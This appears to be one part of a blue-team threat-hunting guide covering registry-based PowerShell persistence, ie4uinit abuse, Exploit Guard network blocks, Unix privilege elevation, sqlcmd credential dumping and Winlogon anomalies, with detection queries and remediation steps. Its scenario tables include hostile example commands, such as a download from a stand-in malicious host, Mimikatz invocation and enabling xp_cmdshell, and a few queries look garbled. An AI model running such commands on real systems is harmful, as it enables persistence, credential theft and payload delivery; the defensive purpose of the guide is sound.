Part 7
🚨 PowerShell Invocation from Registry
🔍 1. Attack Breakdown
📝 What is PowerShell Invocation from Registry?
PowerShell Invocation from Registry is a technique where malicious payloads or commands are stored in Windows Registry keys and then executed using PowerShell.
Attackers use this technique for:
Persistence: Execute malicious commands on system startup or user login.
Defense Evasion: Hide commands in registry keys instead of traditional scripts.
Stealth: Avoid dropping visible files on disk.
📑 Why Do Attackers Use the Registry for PowerShell Invocation?
Stealth: Registry-based execution is less visible than file-based attacks.
Persistence: Payloads can be triggered at startup or specific events.
Evasion: Commands stored in registry are harder for traditional antivirus to detect.
Flexibility: Can execute any arbitrary PowerShell code.
📌 Common Attack Scenarios
Technique
Registry Path
Example Payload
Startup Persistence
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
powershell.exe -c "Invoke-WebRequest -Uri http://malicious.com/payload.ps1"
Scheduled Task Registry Key
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks
powershell.exe -EncodedCommand <base64>
AutoRun Key Abuse
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run
powershell.exe -Command Start-Process notepad.exe
Obfuscated Payload in Registry
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System
powershell.exe -c "IEX (Get-Content 'reg_path')"
Shell Handlers
HKCU\Software\Classes\mscfile\shell\open\command
powershell.exe -c Invoke-Mimikatz
🛡️ 2. Detection Techniques
📊 Manual Inspection with PowerShell
🕵️ Search Common Startup Keys for PowerShell Commands
Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' | Select-Object *
Get-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run' | Select-Object *🕵️ Search Registry for PowerShell Commands Globally
reg query HKCU /s /f "powershell"
reg query HKLM /s /f "powershell"🕵️ Inspect Scheduled Tasks in Registry
Get-ChildItem -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks' |
ForEach-Object { Get-ItemProperty -Path $_.PsPath }🕵️ Look for Base64-Encoded PowerShell Commands
reg query HKCU /s /f "powershell.exe -EncodedCommand"🕵️ Monitor Registry Key Changes
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=12} |
Where-Object { $_.Message -like "*powershell*" }📊 Microsoft Defender for Endpoint (MDE) Query (KQL)
🕵️ Detect PowerShell Invocation via Registry Keys
DeviceRegistryEvents
| where RegistryKey contains "CurrentVersion\\Run" or RegistryKey contains "TaskCache"
| where RegistryValueData contains "powershell.exe"
| project Timestamp, DeviceName, RegistryKey, RegistryValueName, RegistryValueData, AccountName🕵️ Identify Base64-Encoded PowerShell Commands in Registry
DeviceRegistryEvents
| where RegistryValueData contains "-EncodedCommand"
| project Timestamp, DeviceName, RegistryKey, RegistryValueData, AccountName🕵️ Trace PowerShell Executions Triggered from Registry Keys
DeviceProcessEvents
| where ProcessCommandLine contains "powershell.exe"
| where InitiatingProcessFileName == "reg.exe"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName🕵️ Detect Suspicious Registry Paths Executing PowerShell
DeviceRegistryEvents
| where RegistryKey contains "Run" or RegistryKey contains "TaskCache"
| where RegistryValueData contains "IEX"
| project Timestamp, DeviceName, RegistryKey, RegistryValueData, AccountName📊 Event Viewer Logs
Event ID
Description
4688
A new process was created (powershell.exe).
4663
Object access attempt detected on a registry key.
4104
PowerShell script block logging (useful for obfuscated payloads).
12 (Sysmon)
Registry key or value was created.
13 (Sysmon)
Registry key or value was modified.
📌 Focus on Event ID 4688:
Look for:
ProcessCommandLine: powershell.exe -c "IEX (Get-ItemProperty 'HKCU:\\malicious_key')"
📌 Focus on Event ID 4663:
Registry access attempts:
RegistryKey: HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
🕵️ 3. Investigation Techniques
1️⃣ Inspect Specific Registry Keys
Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'2️⃣ Trace PowerShell Commands via Sysmon Logs
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=12}3️⃣ Analyze Process Tree
Trace parent-child relationships:
Get-CimInstance Win32_Process | Where-Object { $_.ParentProcessId -eq <PID> }🔧 4. Remediation Steps
📌 1. Remove Malicious Registry Keys
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'SuspiciousKey'📌 2. Disable Registry Editing for Non-Admin Users
Apply Group Policy to prevent unauthorized changes.
📌 3. Monitor Registry Changes Continuously
Enable Registry auditing and monitor changes.
📌 4. Perform Full Antivirus Scan
Start-MpScan -ScanType FullScan🛡️ 5. Prevention Steps
Enable Registry Auditing:
Monitor
HKCU:\RunandHKLM:\Runkeys.
Block Obfuscated PowerShell Commands:
Use Windows Defender Exploit Guard (ASR Rules).
Restrict Registry Access:
Limit modification permissions for sensitive keys.
Enable Command Line Logging:
Track PowerShell invocation via Event ID 4688.
Educate Users:
Avoid executing unknown scripts or registry changes.
🧠 6. Key Takeaways
Focus on Registry Keys:
Run,TaskCache,Explorer\StartupApproved.Monitor Event IDs: 4688, 4663, 12 (Sysmon), 13 (Sysmon).
Look for Obfuscated Payloads:
-EncodedCommand,IEX.
🚨 Unusual ie4uinit Process Path
🔍 1. Attack Breakdown
📝 What is ie4uinit.exe?
ie4uinit.exe?ie4uinit.exeis a legitimate Windows system file located in:C:\Windows\System32\ie4uinit.exeC:\Windows\SysWOW64\ie4uinit.exe
It is used for Internet Explorer user profile initialization and to handle user-specific configurations for the browser.
📑 Why Do Attackers Abuse ie4uinit.exe?
ie4uinit.exe?Trusted Binary: It is signed by Microsoft, making it less suspicious.
Execution Proxy: Can be used to execute malicious payloads indirectly.
Persistence: Often abused in startup tasks or registry keys for persistence.
Evasion: May bypass traditional antivirus and security solutions.
📌 Common Attack Scenarios
Technique
Description
Example Command
Process Path Spoofing
Run ie4uinit.exe from an unusual location.
C:\Temp\ie4uinit.exe
Execution Proxy
Use ie4uinit.exe to execute a malicious DLL.
C:\Windows\Temp\ie4uinit.exe payload.dll
Startup Persistence
Create a startup entry invoking ie4uinit.exe.
reg add HKCU\...\Run /v ie4uinit /t REG_SZ /d "C:\Temp\ie4uinit.exe"
Fileless Execution
Use ie4uinit.exe in-memory execution.
C:\Windows\System32\ie4uinit.exe /k powershell -c <payload>
🛡️ 2. Detection Techniques
📊 Manual Inspection with PowerShell
🕵️ List All ie4uinit.exe Processes
Get-Process -Name ie4uinit | Select-Object Id, Path, StartTime🕵️ Validate ie4uinit.exe Paths
Get-Command ie4uinit.exe | Select-Object Name, Source🕵️ Check ie4uinit.exe in Unusual Directories
Get-ChildItem -Path "C:\Windows\Temp", "C:\Users\Public", "C:\ProgramData" -Filter "ie4uinit.exe" -Recurse🕵️ Inspect ie4uinit.exe Registry Keys
Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' |
Where-Object { $_ -match "ie4uinit" }🕵️ Trace Parent-Child Relationships
Get-CimInstance Win32_Process | Where-Object { $_.Name -eq "ie4uinit.exe" } |
Select-Object ProcessId, ParentProcessId, CommandLine📊 Microsoft Defender for Endpoint (MDE) Query (KQL)
🕵️ Detect ie4uinit.exe Executed from Suspicious Paths
DeviceProcessEvents
| where FileName == "ie4uinit.exe"
| where FolderPath !startswith "C:\\Windows\\System32" and FolderPath !startswith "C:\\Windows\\SysWOW64"
| project Timestamp, DeviceName, FolderPath, ProcessCommandLine, ParentProcessName, AccountName🕵️ Identify Suspicious Parent Processes for ie4uinit.exe
DeviceProcessEvents
| where FileName == "ie4uinit.exe"
| where ParentProcessFileName !in ("explorer.exe", "cmd.exe")
| project Timestamp, DeviceName, ParentProcessFileName, ProcessCommandLine, AccountName🕵️ Trace Registry-Based Persistence with ie4uinit.exe
DeviceRegistryEvents
| where RegistryKey contains "CurrentVersion\\Run"
| where RegistryValueData contains "ie4uinit.exe"
| project Timestamp, DeviceName, RegistryKey, RegistryValueData, AccountName🕵️ Monitor File Creation of ie4uinit.exe in Suspicious Directories
DeviceFileEvents
| where FileName == "ie4uinit.exe"
| where FolderPath contains "Temp" or FolderPath contains "Public"
| project Timestamp, DeviceName, FolderPath, FileName, AccountName📊 Event Viewer Logs
Event ID
Description
4688
A new process was created (ie4uinit.exe).
4663
Object access attempt (e.g., file access).
4104
PowerShell script block execution.
7045
A new service was installed.
📌 Focus on Event ID 4688:
Look for:
ProcessCommandLine: C:\Users\Public\ie4uinit.exe ParentProcessName: cmd.exe
📌 Focus on Event ID 4663:
Registry access:
RegistryKey: HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
🕵️ 3. Investigation Techniques
1️⃣ Trace Unusual Process Paths
Get-Process -Name "ie4uinit" | Select-Object Path2️⃣ Analyze Parent Process
Get-CimInstance Win32_Process | Where-Object { $_.ParentProcessId -eq <PID> }3️⃣ Check Registry for Persistence
reg query HKCU /s /f "ie4uinit.exe"
reg query HKLM /s /f "ie4uinit.exe"🔧 4. Remediation Steps
📌 1. Terminate Malicious Process
Stop-Process -Name "ie4uinit" -Force📌 2. Remove Malicious Files
Remove-Item -Path "C:\Users\Public\ie4uinit.exe" -Force📌 3. Delete Malicious Registry Keys
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "ie4uinit"📌 4. Perform Full Antivirus Scan
Start-MpScan -ScanType FullScan🛡️ 5. Prevention Steps
Monitor System32 and SysWOW64 Integrity:
Ensure
ie4uinit.exeexists only in legitimate paths.
Enable Command Line Auditing:
Track process creation with
ie4uinit.exe.
Restrict Write Access to Sensitive Directories:
Prevent unauthorized writes to
C:\Windows,C:\Users\Public.
Registry Auditing:
Enable alerts for modifications to
Runkeys.
User Awareness:
Educate users on avoiding suspicious downloads or execution prompts.
🧠 6. Key Takeaways
Monitor Process Paths: Validate
ie4uinit.exepaths regularly.Event IDs to Watch: 4688, 4663, 7045.
Check Parent Processes: Look for unusual relationships.
🚨 Exploit Guard Network Protection Blocked Event:
🔍 1. Attack Breakdown
📝 What is Exploit Guard Network Protection?
Exploit Guard Network Protection is a feature in Microsoft Defender for Endpoint (MDE) and Windows Defender Exploit Guard (WDEG).
It prevents network-based attacks by blocking connections to malicious domains, IPs, or URLs.
The feature uses threat intelligence feeds and real-time analysis to detect and block malicious connections.
📑 Why is Network Protection Blocked?
The system detected a malicious network connection attempt from a process or service.
Common reasons include:
Accessing a known malicious domain.
Malware attempting Command and Control (C2) communication.
Phishing attempts via malicious URLs.
Data exfiltration via suspicious outbound traffic.
📌 Common Attack Scenarios
Scenario
Description
Example Indicator
Malware C2 Communication
Malware attempting to connect to a command server.
http://attacker.com/c2
Phishing Website
User accessed a phishing link via browser.
http://phishing-site.com
Data Exfiltration
Sensitive data sent to an external server.
http://malicious-upload.com
Malicious Script Execution
Script triggers outbound traffic to malicious IP.
powershell -c "Invoke-WebRequest http://malicious.com/payload"
Drive-by Download Attack
Website delivers malicious files during browsing.
http://exploit-landing.com
🛡️ 2. Detection Techniques
📊 Manual Inspection with PowerShell
🕵️ Check Defender Network Protection Events in Event Viewer
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Windows Defender/Operational'; Id=1125} | Select-Object TimeCreated, Message🕵️ Inspect Blocked Network Connections
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Windows Defender/Operational'; Id=1125} |
ForEach-Object { $_.Message }🕵️ List Processes Triggering Network Protection Events
Get-Process | Where-Object { $_.Id -in (Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Windows Defender/Operational'; Id=1125} | Select-Object -ExpandProperty ProcessId) }🕵️ Inspect Recent Malicious Domains and URLs Blocked
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Windows Defender/Operational'; Id=1125} |
Where-Object { $_.Message -match "Domain|IP|URL" }📊 Microsoft Defender for Endpoint (MDE) Query (KQL)
🕵️ Detect Exploit Guard Network Protection Blocked Events
DeviceEvents
| where ActionType == "ExploitGuardNetworkProtectionBlocked"
| project Timestamp, DeviceName, AccountName, InitiatingProcessFileName, RemoteIP, RemoteUrl, ActionType🕵️ Identify Processes Triggering Network Blocks
DeviceProcessEvents
| where ActionType == "ExploitGuardNetworkProtectionBlocked"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName🕵️ Trace Malicious URLs or IPs Triggering Network Protection
DeviceNetworkEvents
| where ActionType == "ExploitGuardNetworkProtectionBlocked"
| project Timestamp, DeviceName, RemoteUrl, RemoteIP, AccountName🕵️ Monitor Repeated Block Events from the Same ProceDeviceEvents
| where ActionType == "ExploitGuardNetworkProtectionBlocked"
| summarize Count=count() by InitiatingProcessFileName, RemoteUrl, RemoteIP, DeviceName
| order by Count desc🕵️ Correlate with Web Browsing Activity
DeviceFileEvents
| where InitiatingProcessFileName == "browser.exe"
| where ActionType == "ExploitGuardNetworkProtectionBlocked"
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, AccountName📊 Event Viewer Logs
Event ID
Description
1125
Windows Defender Exploit Guard Network Protection event.
5156
Network connection allowed (trace subsequent connections).
4688
Process creation (trace responsible process).
📌 Focus on Event ID 1125:
Look for:
Action: Blocked RemoteIP: 45.67.89.123 RemoteUrl: http://malicious.com/payload InitiatingProcess: powershell.exe
🕵️ 3. Investigation Techniques
1️⃣ Trace Process Responsible for Blocked Activity
Get-Process -Id <ProcessId>2️⃣ Inspect Command Line Arguments
Review the command used:
Get-CimInstance Win32_Process | Where-Object { $_.ProcessId -eq <PID> }3️⃣ Analyze Remote URLs and IPs
Verify reputation of the URLs and IPs on:
🔧 4. Remediation Steps
📌 1. Terminate Malicious Processes
Stop-Process -Id <ProcessId> -Force📌 2. Block Malicious IPs or Domains
New-NetFirewallRule -DisplayName "Block Malicious IP" -Direction Outbound -RemoteAddress <IP> -Action Block📌 3. Remove Malicious Scheduled Tasks or Startup Entries
Get-ScheduledTask | Where-Object { $_.TaskPath -like "*malicious*" } | Unregister-ScheduledTask -Confirm:$false📌 4. Review User Activity
Check logs for any unusual behavior tied to the user.
📌 5. Perform Full Antivirus Scan
Start-MpScan -ScanType FullScan🛡️ 5. Prevention Steps
Enable Exploit Guard Network Protection:
Ensure it's set to Block Mode in policy.
Regularly Audit Policies:
Verify that malicious sites and IPs are actively blocked.
Monitor High-Risk Users:
Flag repeat offenders for suspicious activity.
Update Security Tools Regularly:
Ensure definitions and threat intelligence feeds are up-to-date.
Educate Users:
Warn against clicking on suspicious links or downloading unknown files.
🧠 6. Key Takeaways
Focus on Event IDs: 1125, 4688, 5156.
Trace Processes Triggering Blocks: Look for repeat offenders.
Correlate with Network Activity: Validate blocked domains and IPs.
Investigate URLs on Threat Intelligence Platforms: Verify malicious indicators.
🚨 Privilege Elevation (Linux & macOS):
🔍 1. Attack Breakdown
📝 What is Privilege Elevation?
Privilege Elevation occurs when an attacker gains higher privileges (e.g., root or admin access) on a system through vulnerabilities, misconfigurations, or design flaws.
This is often used for:
Full System Control: Gain unrestricted access to files and processes.
Persistence: Maintain access across system reboots.
Lateral Movement: Access other systems using elevated privileges.
Data Exfiltration: Bypass access controls.
📑 Why Attackers Seek Privilege Elevation?
Expand Control: Access sensitive files and services.
Bypass Security Controls: Disable security mechanisms.
Establish Persistence: Create backdoors or scheduled tasks.
Credential Dumping: Extract credentials for further compromise.
Cover Tracks: Modify logs and hide malicious activity.
📌 Common Privilege Elevation Techniques
Technique
Linux Example
macOS Example
Sudo Misconfigurations
sudo -l → sudo bash
sudo -l → sudo nano /etc/sudoers
Kernel Exploits
CVE-2021-4034 (Polkit)
CVE-2019-8526
Setuid Binaries
find / -perm -4000
find / -perm +4000
Weak File Permissions
chmod 777 /etc/shadow
chmod 777 /etc/passwd
Exploiting Services
systemctl edit service
launchctl load -w /Library/LaunchDaemons
Environment Variable Abuse
LD_PRELOAD
DYLD_INSERT_LIBRARIES
Credential Dumping
/etc/shadow
security find-generic-password
🛡️ 2. Detection Techniques
📊 Linux Detection Techniques
🕵️ Check for Sudo Misconfigurations
sudo -l🕵️ Identify Setuid Binaries
find / -perm -4000 2>/dev/null🕵️ Check for Writable System Binaries
find /bin /sbin -perm -2 -type f🕵️ Monitor Sudo Logins
Check /var/log/auth.log or /var/log/secure:
grep 'sudo:' /var/log/auth.log🕵️ Identify Suspicious Kernel Modules
lsmod
dmesg | grep "exploit"🕵️ Look for Suspicious Cron Jobs
crontab -l
ls -al /etc/cron*📊 macOS Detection Techniques
🕵️ Check for Sudo Misconfigurations
sudo -l🕵️ List Setuid and Setgid Binaries
find / -perm -4000 -o -perm -2000 -type f 2>/dev/null🕵️ Inspect Launch Daemons and Agents
ls /Library/LaunchDaemons
ls ~/Library/LaunchAgents🕵️ Check for Cron Jobs
crontab -l
ls -al /etc/cron*🕵️ Identify Writable Configuration Files
find /System/Library -perm -2 -type f🕵️ Look for Suspicious Kernel Extensions (kext)
kextstat | grep -v com.apple📊 SIEM Detection Queries
📊 Linux SIEM Query (ELK, Splunk)
🕵️ Detect Sudo Privilege Escalation
index=linux source=/var/log/auth.log
| search "sudo:root"
| stats count by user, command🕵️ Monitor Exploitation Attempts
index=linux source=/var/log/messages OR /var/log/syslog
| search "exploit"
| stats count by host, message🕵️ Identify Abnormal Cron Job Modifications
index=linux source=/etc/cron*
| stats count by user, command🕵️ Track Writable Binary Directories
index=linux
| search "chmod 777"
| stats count by user, path📊 macOS SIEM Query (Splunk, ELK)
🕵️ Detect LaunchDaemon Manipulation
index=macos source=/var/log/system.log
| search "launchctl load"
| stats count by user, command🕵️ Monitor Sudo Commands
index=macos source=/var/log/system.log
| search "sudo:"
| stats count by user, command🕵️ Identify Suspicious Kernel Module Loading
index=macos source=/var/log/system.log
| search "kextstat"
| stats count by user, command🕵️ Monitor DYLD_INSERT_LIBRARIES Abuse
index=macos source=/var/log/system.log
| search "DYLD_INSERT_LIBRARIES"
| stats count by user, command🛡️ 3. Investigation Techniques
1️⃣ Trace Privilege Escalation Attempts
grep "sudo" /var/log/auth.log
grep "root" /var/log/secure2️⃣ Analyze Exploit Attempts
dmesg | grep -i exploit
journalctl -k | grep -i exploit3️⃣ Review New Cron Jobs
ls -al /etc/cron*🔧 4. Remediation Steps
📌 1. Remove Malicious Cron Jobs
crontab -r
rm -f /etc/cron.d/malicious📌 2. Revert Permissions
chmod 644 /etc/passwd
chmod 600 /etc/shadow📌 3. Disable Suspicious LaunchAgents
launchctl unload ~/Library/LaunchAgents/malicious.plist📌 4. Revoke Sudo Permissions for Compromised Accounts
usermod -L compromised_user📌 5. Perform Full Antivirus Scan
clamscan -r / --bell -i🛡️ 5. Prevention Steps
Enable SELinux (Linux): Enforce security contexts.
Enable SIP (macOS): Protect system directories.
Limit Sudo Access: Use least privilege principles.
Monitor Logs: Regularly review auth logs.
Disable Unused Services: Stop unnecessary daemons and agents.
🧠 6. Key Takeaways
Privilege Escalation is Critical: Early detection is key.
Focus on Key Logs:
/var/log/auth.log,/var/log/secure,system.log.SIEM Queries: Use KQL, Splunk, or FQL for real-time monitoring.
Enable Integrity Checks: Ensure permissions on sensitive files are secure.
🚨 Credential Dumping Using sqlcmd.exe
sqlcmd.exe🔍 1. Attack Breakdown
📝 What is sqlcmd.exe?
sqlcmd.exe?sqlcmd.exeis a command-line utility provided by Microsoft SQL Server.It allows users to connect to SQL Server databases, execute T-SQL commands, and query data.
📑 Why Do Attackers Abuse sqlcmd.exe?
sqlcmd.exe?Trusted Binary: Signed by Microsoft and often allowed by security controls.
Credential Access: Extract stored database credentials.
Lateral Movement: Use database credentials to pivot across systems.
Data Exfiltration: Export sensitive data.
Persistence: Store payloads in SQL Server jobs or procedures.
📌 Common Attack Scenarios
Technique
Description
Example Command
Extract Database Credentials
Access SQL Server credentials from memory.
sqlcmd -Q "SELECT * FROM sys.sql_logins"
Retrieve Hashes from SQL Tables
Dump hashed credentials.
sqlcmd -Q "SELECT name, password_hash FROM sys.sql_logins"
Run Malicious Queries
Execute malicious SQL commands.
sqlcmd -Q "EXEC xp_cmdshell 'whoami'"
Enable xp_cmdshell for System Access
Enable external command execution.
sqlcmd -Q "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"
Persist via SQL Agent Jobs
Create malicious SQL Server jobs.
sqlcmd -Q "EXEC msdb.dbo.sp_add_job @job_name='MaliciousJob', @enabled=1;"
🛡️ 2. Detection Techniques
📊 Manual Inspection with SQLCMD
🕵️ Check Active SQLCMD Sessions
SELECT * FROM sys.dm_exec_sessions WHERE program_name LIKE '%SQLCMD%';🕵️ Identify Suspicious Commands Executed via SQLCMD
SELECT sql_text FROM sys.dm_exec_requests CROSS APPLY sys.dm_exec_sql_text(sql_handle) WHERE session_id > 50;🕵️ Monitor SQL Server Agent Jobs
SELECT * FROM msdb.dbo.sysjobs;🕵️ Look for xp_cmdshell Execution
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';🕵️ Check for Suspicious Logins
SELECT name, create_date, is_disabled FROM sys.sql_logins;📊 Manual Inspection with PowerShell
🕵️ Identify Suspicious SQLCMD Processes
Get-Process -Name sqlcmd | Select-Object Id, ProcessName, Path, StartTime🕵️ Inspect SQLCMD Command-Line History
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | Where-Object { $_.Message -like "*sqlcmd*" }🕵️ Check SQLCMD Network Connections
Get-NetTCPConnection -OwningProcess (Get-Process -Name sqlcmd).Id📊 Microsoft Defender for Endpoint (MDE) Query (KQL)
🕵️ Detect SQLCMD Process Execution
DeviceProcessEvents
| where FileName == "sqlcmd.exe"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName🕵️ Identify SQLCMD with Suspicious Command-Line Arguments
DeviceProcessEvents
| where FileName == "sqlcmd.exe"
| where ProcessCommandLine contains "xp_cmdshell" or ProcessCommandLine contains "password_hash"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName🕵️ Trace SQLCMD Network Activity
DeviceNetworkEvents
| where InitiatingProcessFileName == "sqlcmd.exe"
| project Timestamp, DeviceName, RemoteIP, RemotePort, ProcessCommandLine, AccountName🕵️ Monitor SQLCMD Accessing Sensitive Tables
DeviceFileEvents
| where InitiatingProcessFileName == "sqlcmd.exe"
| where FileName contains "sys.sql_logins"
| project Timestamp, DeviceName, FileName, AccountName🕵️ Detect SQLCMD Persistence Mechanisms
DeviceProcessEvents
| where FileName == "sqlcmd.exe"
| where ProcessCommandLine contains "sp_add_job"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName📊 Event Viewer Logs
Event ID
Description
4688
New process created (sqlcmd.exe).
4624
Account logon (look for database access).
4768
Kerberos Authentication Ticket requested.
4104
PowerShell script block logging.
5156
Network connection allowed.
📌 Focus on Event ID 4688:
Look for:
ProcessCommandLine: sqlcmd -Q "SELECT * FROM sys.sql_logins"
📌 Focus on Event ID 4624:
Look for suspicious logins via SQLCMD.
🕵️ 3. Investigation Techniques
1️⃣ Review SQL Server Error Logs
EXEC xp_readerrorlog;2️⃣ Trace SQLCMD Commands from System Logs
Review authentication attempts:
SELECT * FROM sys.dm_exec_connections;3️⃣ Inspect SQLCMD Parent-Child Processes
Get-CimInstance Win32_Process | Where-Object { $_.ParentProcessId -eq <SQLCMD_PID> }🔧 4. Remediation Steps
📌 1. Disable xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;📌 2. Revoke Unnecessary Database Permissions
REVOKE CONNECT FROM [malicious_user];📌 3. Terminate Malicious SQLCMD Processes
Stop-Process -Name sqlcmd -Force📌 4. Remove Malicious SQL Jobs
EXEC msdb.dbo.sp_delete_job @job_name='MaliciousJob';📌 5. Perform Full Antivirus Scan
Start-MpScan -ScanType FullScan🛡️ 5. Prevention Steps
Restrict
xp_cmdshell: Disable unless absolutely necessary.Implement Role-Based Access Control (RBAC): Minimize privileged accounts.
Enable SQL Server Audit Logs: Track administrative activities.
Network Segmentation: Limit SQL Server access.
Monitor SQLCMD Processes: Create alerts for unusual commands.
🧠 6. Key Takeaways
Focus on Event IDs: 4688, 4624, 4768.
Monitor SQLCMD Commands: Look for
xp_cmdshelland sensitive queries.Limit Privileges: Ensure
sqlcmdcannot execute arbitrary system commands.
🚨 Suspicious Connection by Winlogon.exe
🔍 1. Attack Breakdown
📝 What is Winlogon.exe?
Winlogon.exe?Winlogon.exeis a core Windows process responsible for handling user login, desktop initialization, and user session management.It’s located in:
C:\Windows\System32\winlogon.exe
It should never establish outbound network connections under normal circumstances.
📑 Why Do Attackers Abuse Winlogon.exe?
Winlogon.exe?Trusted Binary: Signed by Microsoft and rarely monitored.
Stealth: Blends in with legitimate processes.
Evasion: Evades traditional antivirus and security tools.
Persistence: Can be abused for long-term persistence.
Data Exfiltration: Used to hide outbound communication.
📌 Common Attack Scenarios
Technique
Description
Example Indicator
Code Injection into Winlogon
Malicious code injected into Winlogon.
rundll32.exe inject.dll
Winlogon Network Communication
Unauthorized outbound connections from Winlogon.
winlogon.exe connects to 192.168.1.100
Persistence via Registry
Backdoors set in Winlogon registry keys.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
Credential Theft
Exfiltration of cached credentials.
winlogon.exe dumps LSASS process
Proxy for Malware C2 Traffic
Winlogon used to proxy C2 connections.
winlogon.exe connects to malicious.com
🛡️ 2. Detection Techniques
📊 Manual Inspection with PowerShell
🕵️ Verify Winlogon Process Path
Get-Process -Name winlogon | Select-Object Id, Path✅ Expected Path:
C:\Windows\System32\winlogon.exe❌ Suspicious Path:
C:\Users\Public\winlogon.exe,C:\Temp\winlogon.exe
🕵️ Check Network Connections by Winlogon
Get-Process -Name winlogon | ForEach-Object {
Get-NetTCPConnection -OwningProcess $_.Id
}Look for Outbound Connections to:
Unfamiliar IPs.
Non-standard ports (e.g., 4444, 8080).
🕵️ Inspect Parent-Child Relationship
Get-CimInstance Win32_Process | Where-Object { $_.Name -eq "winlogon.exe" } | Select-Object ProcessId, ParentProcessId, CommandLine✅ Expected Parent Process:
services.exe❌ Unexpected Parent Process:
cmd.exe,powershell.exe
🕵️ Inspect Winlogon Registry Keys
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"Focus on:
Userinit(should point touserinit.exe)Shell(should point toexplorer.exe)
📊 Microsoft Defender for Endpoint (MDE) Query (KQL)
🕵️ Detect Winlogon Outbound Network Connections
DeviceNetworkEvents
| where InitiatingProcessFileName == "winlogon.exe"
| where RemoteIP != "127.0.0.1" and RemoteIP != "::1"
| project Timestamp, DeviceName, RemoteIP, RemotePort, ProcessCommandLine, AccountName🕵️ Monitor Suspicious Winlogon Registry Changes
DeviceRegistryEvents
| where RegistryKey contains "Winlogon"
| where RegistryValueName in ("Userinit", "Shell")
| project Timestamp, DeviceName, RegistryKey, RegistryValueData, AccountName🕵️ Trace Process Tree Involving Winlogon
DeviceProcessEvents
| where FileName == "winlogon.exe"
| where ParentProcessName != "services.exe"
| project Timestamp, DeviceName, ProcessCommandLine, ParentProcessName, AccountName🕵️ Identify Code Injection into Winlogon
DeviceProcessEvents
| where FileName == "winlogon.exe"
| where ProcessCommandLine contains "CreateRemoteThread"
| project Timestamp, DeviceName, ProcessCommandLine, AccountNam📊 Event Viewer Logs
Event ID
Description
4688
A new process was created (winlogon.exe).
5156
Network connection allowed.
4663
Registry key access detected.
7045
A new service was installed.
📌 Focus on Event ID 4688:
Look for:
ProcessCommandLine: winlogon.exe -c "powershell.exe -EncodedCommand" ParentProcessName: cmd.exe
📌 Focus on Event ID 4663:
Registry key modification:
RegistryKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
🕵️ 3. Investigation Techniques
1️⃣ Validate Winlogon Binary Integrity
Get-FileHash "C:\Windows\System32\winlogon.exe" -Algorithm SHA256Compare hash on VirusTotal.
2️⃣ Inspect Winlogon Startup Configurations
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"3️⃣ Trace Winlogon’s Network Traffic
netstat -ano | findstr <Winlogon_PID>🔧 4. Remediation Steps
📌 1. Terminate Suspicious Winlogon Processes
Stop-Process -Id <PID> -Force📌 2. Restore Registry Keys
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit" -Value "userinit.exe"
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell" -Value "explorer.exe"📌 3. Remove Suspicious Executables
Remove-Item -Path "C:\Users\Public\winlogon.exe" -Force📌 4. Block Malicious IPs
New-NetFirewallRule -DisplayName "Block Malicious IP" -Direction Outbound -RemoteAddress <IP> -Action Block📌 5. Perform Full Antivirus Scan
Start-MpScan -ScanType FullScan🛡️ 5. Prevention Steps
Enable Command Line Auditing: Track Winlogon execution.
Monitor Registry Changes: Enable alerts for Winlogon keys.
Restrict Registry Permissions: Prevent unauthorized modifications.
Review Firewall Rules: Block unnecessary outbound connections.
Enable Behavioral Analytics: Use EDR to monitor anomalies.
🧠 6. Key Takeaways
Winlogon.exe Should Not Make Network Connections: Flag outbound traffic.
Monitor Registry Keys: Validate
UserinitandShell.Focus on Event IDs: 4688, 4663, 5156.
Investigate Parent-Child Process Trees: Ensure legitimate parent processes.
🚨 Image File Execution Options (IFEO) Injection: Advanced Threat Analysis
🔍 1. Attack Breakdown
📝 What is IFEO (Image File Execution Options)?
Image File Execution Options (IFEO) is a Windows Registry key designed for debugging applications.
Attackers exploit IFEO to:
Hijack legitimate applications.
Establish persistence by injecting malicious binaries.
Redirect application execution to malicious payloads.
📑 Why Do Attackers Use IFEO Injection?
Persistence: Payloads execute every time the targeted application runs.
